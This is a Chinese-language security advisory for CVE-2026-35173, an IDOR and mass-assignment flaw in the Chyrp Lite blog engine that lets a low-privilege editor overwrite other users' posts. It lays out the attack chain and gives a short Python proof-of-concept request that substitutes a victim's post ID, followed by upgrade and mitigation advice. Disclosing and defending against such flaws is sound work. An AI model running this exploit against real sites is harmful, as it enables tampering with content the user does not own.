CVE-2026-35173 CVSS 6.5 中危

CVE-2026-35173 Chyrp Lite IDOR漏洞导致文章接管

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35173

漏洞类型

IDOR / Mass Assignment

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Chyrp Lite

漏洞概述

Chyrp Lite是一款轻量级博客引擎。在2026.01版本之前，该产品存在IDOR（不安全的直接对象引用）和批量赋值漏洞。拥有特定编辑权限的认证用户可以通过在post_attributes载荷中恶意指定id参数，修改其无权访问的其他用户的文章，从而实现文章接管。

技术细节

该漏洞源于Chyrp Lite在处理Post模型更新请求时，存在不安全的直接对象引用（IDOR）及批量赋值缺陷。系统在实例化对象时未对用户输入的内部属性（如id）进行严格过滤。攻击者只需具备基础编辑权限（如编辑自己的文章），即可通过构造包含目标文章ID的恶意数据包发送给后端。由于服务端仅校验了类层面的操作权限而未校验资源归属，导致攻击者能篡改任意文章ID的内容，造成数据完整性破坏。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者注册或获取一个具有基础编辑权限（如Edit Own Post）的账户，并登录系统。

STEP 2

2. 确定目标

攻击者浏览博客，找到想要接管的目标文章（例如属于管理员的文章），并记录其ID。

STEP 3

3. 漏洞利用

攻击者拦截或构造更新文章的请求，在post_attributes参数中将id字段的值替换为目标文章的ID，并提交恶意内容。

STEP 4

4. 权限提升与影响

服务器因未校验ID归属，将攻击者的修改应用到了目标文章上，导致文章被篡改或接管。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for updating a post
url = "http://target-chyrp-lite.com/admin/?action=update_post"

# Attacker's session cookie (low privilege user)
cookies = {
    "PHPSESSID": "attacker_valid_session_id"
}

# Malicious payload exploiting Mass Assignment/IDOR
# The attacker modifies 'id' to point to a victim's post (e.g., ID 42)
payload = {
    "post_attributes": {
        "id": "42",  
        "title": "Hacked by Attacker",
        "body": "This content has been modified via IDOR."
    },
    "hash": "required_form_token_hash"
}

response = requests.post(url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! Post 42 likely modified.")
else:
    print("[-] Exploit failed.")

影响范围

Chyrp Lite < 2026.01

防御指南

临时缓解措施

建议立即检查当前Chyrp Lite版本，并应用官方补丁升级至2026.01。如果无法立即升级，应在代码层面对用户提交的post_attributes进行过滤，移除id等受保护字段，并在执行更新操作前强制核对当前用户与文章所有者的关系。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表